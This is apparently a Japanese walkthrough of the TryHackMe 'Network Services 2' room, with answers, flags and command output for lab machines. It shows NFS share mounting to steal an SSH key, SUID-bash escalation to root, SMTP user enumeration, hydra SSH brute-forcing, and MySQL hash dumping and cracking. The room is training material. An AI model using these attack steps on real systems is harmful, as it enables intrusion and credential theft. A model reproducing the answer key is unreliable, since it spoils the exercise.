概要
TryHackMe「Network Services 2」のWalkthroughです。
Task2
Q1.What does NFS stand for?
A.Network File System
Q2.What process allows an NFS client to interact with a remote directory as though it was a physical device?
Hint.What does your Operating System do to access a physical drive?
A.Mounting
Q3.What does NFS use to represent files and directories on the server?
A.file handle
Q4.What protocol does NFS use to communicate between the server and client?
A.RPC
Q5.What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1 / parameter 2
A.user id / group id
Q6.Can a Windows NFS server share files with a Linux client? (Y/N)
A.Y
Q7.Can a Linux NFS server share files with a MacOS client? (Y/N)
A.Y
Q8.What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.
A.4.2
Task3
Q1.Conduct a thorough port scan scan of your choosing, how many ports are open?
ポートスキャンを実行します。
$ nmap -Pn -T4 -sVC -A -p- 10.10.229.85 -oN nmap_result
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 73:92:8e:04:de:40:fb:9c:90:f9:cf:42:70:c8:45:a7 (RSA)
| 256 6d:63:d6:b8:0a:67:fd:86:f1:22:30:2b:2d:27:1e:ff (ECDSA)
|_ 256 bd:08:97:79:63:0f:80:7c:7f:e8:50:dc:59:cf:39:5e (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 38529/tcp mountd
| 100005 1,2,3 45200/udp mountd
| 100005 1,2,3 46042/udp6 mountd
| 100005 1,2,3 51499/tcp6 mountd
| 100021 1,3,4 36336/udp nlockmgr
| 100021 1,3,4 37271/tcp nlockmgr
| 100021 1,3,4 41253/tcp6 nlockmgr
| 100021 1,3,4 59498/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs 3-4 (RPC #100003)
37271/tcp open nlockmgr 1-4 (RPC #100021)
38529/tcp open mountd 1-3 (RPC #100005)
55955/tcp open mountd 1-3 (RPC #100005)
57137/tcp open mountd 1-3 (RPC #100005)
A.7
Q2.Which port contains the service we're looking to enumerate?
A.2049
Q3.Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?
NFSの共有名を列挙します。
$ showmount -e 10.10.229.85
Export list for 10.10.229.85:
/home *
A./home
Q4.Then, use the mount command we broke down earlier to mount the NFS share to your local machine. Change directory to where you mounted the share- what is the name of the folder inside?
/tmp配下にフォルダを作成し、そこにマウントします。
$ mkdir /tmp/mount
$ sudo mount 10.10.229.85:/home /tmp/mount
$ ls -la /tmp/mount
total 12
drwxr-xr-x 3 root root 4096 Apr 21 2020 .
drwxrwxrwt 14 root root 4096 Nov 7 03:21 ..
drwxr-xr-x 5 kali kali 4096 Jun 4 2020 cappucino
A.cappucino
Q6.Interesting! Let's do a bit of research now, have a look through the folders. Which of these folders could contain keys that would give us remote access to the server?
/home/cappucino/.sshを発見しました。
$ ls -la .ssh/
total 20
drwx------ 2 kali kali 4096 Apr 22 2020 .
drwxr-xr-x 5 kali kali 4096 Jun 4 2020 ..
-rw------- 1 kali kali 399 Apr 22 2020 authorized_keys
-rw------- 1 kali kali 1679 Apr 22 2020 id_rsa
-rw-r--r-- 1 kali kali 399 Apr 22 2020 id_rsa.pub
A..ssh
Q7.Which of these keys is most useful to us?
Hint.What is the default name of an SSH identity file?
id_rsaからSSH秘密鍵を得られました。
A.id_rsa
Q8.Can we log into the machine using ssh -i @ ? (Y/N)
cappucinoでSSH接続に成功しました。
$ ssh -i id_rsa cappucino@10.10.229.85
cappucino@polonfs:~$
A.Y
Task4
Q3.Now, we're going to add the SUID bit permission to the bash executable we just copied to the share using "sudo chmod +[permission] bash". What letter do we use to set the SUID bit set using chmod?
/bin/bashをローカルにコピーします。
$ scp -i id_rsa cappucino@10.10.92.181:/bin/bash .
bashをNFSの共有上にコピーします。
$ cp ~/Network-Services-2/bash ./
所有者をrootにします。
$ sudo chown root bash
$ ls -la
total 1124
drwxr-xr-x 5 kali kali 4096 Nov 7 08:16 .
drwxr-xr-x 3 root root 4096 Apr 21 2020 ..
-rwxr-xr-x 1 root kali 1113504 Nov 7 08:16 bash
SUIDをbashに付与します。
$ sudo chmod +s bash
A.s
Q4.Let's do a sanity check, let's check the permissions of the "bash" executable using "ls -la bash". What does the permission set look like? Make sure that it ends with -sr-x.
ここまでのコマンドを実行すると下記のような権限設定になります。
$ ls -la
total 1124
drwxr-xr-x 5 kali kali 4096 Nov 7 08:16 .
drwxr-xr-x 3 root root 4096 Apr 21 2020 ..
-rwsr-sr-x 1 root kali 1113504 Nov 7 08:16 bash
A.-rwsr-sr-x
Q6.Great! If all's gone well you should have a shell as root! What's the root flag?
SSHでログインし、SUIDが設定されたbashプログラムを確認できます。
$ ssh -i ~/Network-Services-2/id_rsa cappucino@10.10.92.181
cappucino@polonfs:~$ ls -la
total 1124
drwxr-xr-x 5 cappucino cappucino 4096 Nov 7 13:16 .
drwxr-xr-x 3 root root 4096 Apr 21 2020 ..
-rwsr-sr-x 1 root cappucino 1113504 Nov 7 13:16 bash
-pオプションでroot権限に昇格できました。
$ ./bash -p
bash-4.4# whoami
root
/root/root.txtからフラグを入手できました。
/root/root.txt
THM{nfs_got_pwned}
A.THM{nfs_got_pwned}
Task5
Q1.What does SMTP stand for?
A.Simple Mail Transfer Protocol
Q2.What does SMTP handle the sending of? (answer in plural)
A.emails
Q3.What is the first step in the SMTP process?
A.SMTP handshake
Q4.What is the default SMTP port?
A.25
Q5.Where does the SMTP server send the email if the recipient's server is not available?
A.smtp queue
Q6.On what server does the Email ultimately end up on?
A.POP/IMAP
Q7.Can a Linux machine run an SMTP server? (Y/N)
A.Y
Q8.Can a Windows machine run an SMTP server? (Y/N)
A.Y
Task6
Q1.First, lets run a port scan against the target machine, same as last time. What port is SMTP running on?
ポートスキャンを実行します。
$ nmap -Pn -T4 -sVC -A -p- 10.10.72.20 -oN nmap_result2
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 62:a7:03:13:39:08:5a:07:80:1a:e5:27:ee:9b:22:5d (RSA)
| 256 89:d0:40:92:15:09:39:70:17:6e:c5:de:5b:59:ee:cb (ECDSA)
|_ 256 56:7c:d0:c4:95:2b:77:dd:53:d6:e6:73:99:24:f6:86 (ED25519)
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=polosmtp
| Subject Alternative Name: DNS:polosmtp
| Not valid before: 2020-04-22T18:38:06
|_Not valid after: 2030-04-20T18:38:06
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: polosmtp.home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
A.25
Q2.Okay, now we know what port we should be targeting, let's start up Metasploit. What command do we use to do this?
msfconsoleコマンドでMetasploitを起動します。
A.msfconsole
Q3.Let's search for the module "smtp_version", what's it's full module name?
モジュールを検索します。
msf6 > search smtp_version
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smtp/smtp_version . normal No SMTP Banner Grabber
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smtp/smtp_version
A.auxiliary/scanner/smtp/smtp_version
Q4.Great, now- select the module and list the options. How do we do this?
モジュールを選択し、オプションを確認します。
msf6 > use 0
msf6 auxiliary(scanner/smtp/smtp_version) > options
Module options (auxiliary/scanner/smtp/smtp_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/us
ing-metasploit.html
RPORT 25 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
A.options
Q5.Have a look through the options, does everything seem correct? What is the option we need to set?
RPORT,THREADSはデフォルトの設定があり、RHOSTSの設定が必要です。
A.RHOSTS
Q6.Set that to the correct value for your target machine. Then run the exploit. What's the system mail name?
Hint.What looks roughly like the end of an E-Mail address?
モジュールを実行し、確認します。
msf6 auxiliary(scanner/smtp/smtp_version) > exploit
[+] 10.10.72.20:25 - 10.10.72.20:25 SMTP 220 polosmtp.home ESMTP Postfix (Ubuntu)\x0d\x0a
[*] 10.10.72.20:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
A.polosmtp.home
Q7.What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.
Hint.If I want to send a letter to my friend I have to **** it.
モジュールの実行結果からpostfixが使用されていると分かりました。
A.postfix
Q8.Good! We've now got a good amount of information on the target system to move onto the next stage. Let's search for the module "smtp_enum", what's it's full module name?
smtp_enumでモジュールを検索します。
msf6 auxiliary(scanner/smtp/smtp_version) > search smtp_enum
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smtp/smtp_enum . normal No SMTP User Enumeration Utility
A.auxiliary/scanner/smtp/smtp_enum
Q9.What option do we need to set to the wordlist's path?
モジュールのオプションを確認します。
msf6 auxiliary(scanner/smtp/smtp_enum) > show options
Module options (auxiliary/scanner/smtp/smtp_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using
-metasploit/basics/using-metasploit.html
RPORT 25 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
UNIXONLY true yes Skip Microsoft bannered servers when testing unix users
USER_FILE /usr/share/metasploit-framework/da yes The file that contains a list of probable users accounts.
ta/wordlists/unix_users.txt
seclistのtop-usernames-shortlist.txtワードファイルを設定します。
msf6 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE /usr/share/seclists/Usernames/top-usernames-shortlist.txt
A.USER_FILE
Q10.Once we've set this option, what is the other essential paramater we need to set?
RHOSTSオプションの設定をします。
msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 10.10.72.20
A.RHOSTS
Q12.Okay! Now that's finished, what username is returned?
モジュールを実行します。
msf6 auxiliary(scanner/smtp/smtp_enum) > exploit
[*] 10.10.72.20:25 - 10.10.72.20:25 Banner: 220 polosmtp.home ESMTP Postfix (Ubuntu)
[+] 10.10.72.20:25 - 10.10.72.20:25 Users found: administrator
[*] 10.10.72.20:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
A.administrator
Task7
Q1.What is the password of the user we found during our enumeration stage?
administratorのSSHパスワードをhydraで特定します。
$ hydra -f -l administrator -P /usr/share/wordlists/rockyou.txt 10.10.72.20 ssh -t 16
[22][ssh] host: 10.10.72.20 login: administrator password: alejandro
A.alejandro
Q2.Great! Now, let's SSH into the server as the user, what is contents of smtp.txt
administratorでSSH接続し、テキストファイルを確認します。
$ ssh administrator@10.10.72.20
administrator@polosmtp:~$ cat smtp.txt
THM{who_knew_email_servers_were_c00l?}
A.THM{who_knew_email_servers_were_c00l?}
Task8
Q1.What type of software is MySQL?
A.relational database management system
Q2.What language is MySQL based on?
A.SQL
Q3.What communication model does MySQL use?
A.client-server
Q4.What is a common application of MySQL?
A.back end database
Q5.What major social network uses MySQL as their back-end database? This will require further research.
Hint.Who was involved in the Cambridge Analytica scandal?
A.Facebook
Task9
Q1.As always, let's start out with a port scan, so we know what port the service we're trying to attack is running on. What port is MySQL using?
ポートスキャンを実行します。
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:36:56:2f:f0:d4:a4:d2:ab:6a:43:3e:c0:f9:9b:2d (RSA)
| 256 30:bd:be:28:bd:32:dc:f6:ff:28:b2:57:57:31:d9:cf (ECDSA)
|_ 256 f2:3b:82:4a:5c:d2:18:19:89:1f:cd:92:0a:c7:cf:65 (ED25519)
3306/tcp open mysql MySQL 5.7.29-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.7.29-0ubuntu0.18.04.1
| Thread ID: 5
| Capabilities flags: 65535
| Some Capabilities: SupportsLoadDataLocal, Support41Auth, Speaks41ProtocolOld, ConnectWithDatabase, SwitchToSSLAfterHandshake, ODBCClient, Speaks41ProtocolNew, SupportsTransactions, IgnoreSigpipes, SupportsCompression, LongPassword, IgnoreSpaceBeforeParenthesis, FoundRows, LongColumnFlag, InteractiveClient, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: pH\x07@\x198na,Y*\x11J\x11K`.=[/
|_ Auth Plugin Name: mysql_native_password
| ssl-cert: Subject: commonName=MySQL_Server_5.7.29_Auto_Generated_Server_Certificate
| Not valid before: 2020-04-23T10:13:27
|_Not valid after: 2030-04-21T10:13:27
|_ssl-date: TLS randomness does not represent time
A.3306
Q4.Search for, select and list the options it needs. What three options do we need to set? (in descending order).
Hint.Each option name is separated by a /
Metasploitを起動しmysql_sqlでモジュールを検索します。
msf6 > search mysql_sql
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/mysql/mysql_sql . normal No MySQL SQL Generic Query
msf6 > use 0
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/mysql/mysql_sql) > show options
Module options (auxiliary/admin/mysql/mysql_sql):
Name Current Setting Required Description
---- --------------- -------- -----------
SQL select version() yes The SQL to execute.
Used when connecting via an existing SESSION:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u
sing-metasploit.html
RPORT 3306 no The target port (TCP)
USERNAME no The username to authenticate as
A.PASSWORD/RHOSTS/USERNAME
Q5.Run the exploit. By default it will test with the "select version()" command, what result does this give you?
モジュールを実行し、バージョン情報を取得します。
msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.9.192
[*] 10.10.9.192:3306 - Sending statement: 'select version()'...
[*] 10.10.9.192:3306 - | 5.7.29-0ubuntu0.18.04.1 |
[*] Auxiliary module execution completed
A.5.7.29-0ubuntu0.18.04.1
Q6.Great! We know that our exploit is landing as planned. Let's try to gain some more ambitious information. Change the "sql" option to "show databases". how many databases are returned?
SQLオプションの構文を変更します。
msf6 auxiliary(admin/mysql/mysql_sql) > set sql show databases
sql => show databases
DB一覧を取得できました。
msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.9.192
[*] 10.10.9.192:3306 - Sending statement: 'show databases'...
[*] 10.10.9.192:3306 - | information_schema |
[*] 10.10.9.192:3306 - | mysql |
[*] 10.10.9.192:3306 - | performance_schema |
[*] 10.10.9.192:3306 - | sys |
[*] Auxiliary module execution completed
A.4
Task10
Q1.First, let's search for and select the "mysql_schemadump" module. What's the module's full name?
Metasploitでmysql_schemadumpを検索します。
msf6 auxiliary(admin/mysql/mysql_sql) > search mysql_schemadump
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_schemadump . normal No MYSQL Schema Dump
A.auxiliary/scanner/mysql/mysql_schemadump
Q2.Great! Now, you've done this a few times by now so I'll let you take it from here. Set the relevant options, run the exploit. What's the name of the last table that gets dumped?
モジュールのオプションを設定します。
msf6 auxiliary(scanner/mysql/mysql_schemadump) > show options
Module options (auxiliary/scanner/mysql/mysql_schemadump):
Name Current Setting Required Description
---- --------------- -------- -----------
DISPLAY_RESULTS true yes Display the Results to the Screen
Used when connecting via an existing SESSION:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD password no The password for the specified username
RHOSTS 10.10.9.192 no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u
sing-metasploit.html
RPORT 3306 no The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no The username to authenticate as
モジュールを実行し、DB情報を取得します。
msf6 auxiliary(scanner/mysql/mysql_schemadump) > exploit
- DBName: sys
(省略)
- TableName: x$waits_global_by_latency
Columns:
- ColumnName: events
ColumnType: varchar(128)
- ColumnName: total
ColumnType: bigint(20) unsigned
- ColumnName: total_latency
ColumnType: bigint(20) unsigned
- ColumnName: avg_latency
ColumnType: bigint(20) unsigned
- ColumnName: max_latency
ColumnType: bigint(20) unsigned
A.x$waits_global_by_latency
Q3.Awesome, you have now dumped the tables, and column names of the whole database. But we can do one better... search for and select the "mysql_hashdump" module. What's the module's full name?
mysql_hashdumpでモジュールを検索します。
msf6 auxiliary(scanner/mysql/mysql_schemadump) > search mysql_hashdump
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_hashdump . normal No MYSQL Password Hashdump
1 auxiliary/analyze/crack_databases . normal No Password Cracker: Databases
2 \_ action: hashcat . . . Use Hashcat
3 \_ action: john . . . Use John the Ripper
A.auxiliary/scanner/mysql/mysql_hashdump
Q4.Again, I'll let you take it from here. Set the relevant options, run the exploit. What non-default user stands out to you?
モジュールのオプションを設定します。
msf6 auxiliary(scanner/mysql/mysql_hashdump) > show options
Module options (auxiliary/scanner/mysql/mysql_hashdump):
Used when connecting via an existing SESSION:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION no The session to run this module on
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD password no The password for the specified username
RHOSTS 10.10.9.192 no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u
sing-metasploit.html
RPORT 3306 no The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no The username to authenticate as
実行し、ユーザー一覧を取得できました。
msf6 auxiliary(scanner/mysql/mysql_hashdump) > exploit
[+] 10.10.9.192:3306 - Saving HashString as Loot: root:
[+] 10.10.9.192:3306 - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.9.192:3306 - Saving HashString as Loot: mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.9.192:3306 - Saving HashString as Loot: debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
[+] 10.10.9.192:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.10.9.192:3306 - Saving HashString as Loot: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
[*] 10.10.9.192:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
A.carl
Q5.What is the user/hash combination string?
Hint.Remember to input the whole hash string, like: carl:(HASHDATA)*
A.*carl:EA031893AA21444B170FC2162A56978B8CEECE18
Q6.Now, we need to crack the password! Let's try John the Ripper against it using: "john hash.txt" what is the password of the user we found?
carlのハッシュ値を解析します。
$ john carl_hash --wordlist=/usr/share/wordlists/rockyou.txt
doggie (carl)
A.doggie
Q7.What's the contents of MySQL.txt
ターゲットサーバーにcarlアカウントでSSH接続し、MySQL.txtの内容を確認します。
$ ssh carl@10.10.9.192
carl@polomysql:~$ cat MySQL.txt
THM{congratulations_you_got_the_mySQL_flag}
A.THM{congratulations_you_got_the_mySQL_flag}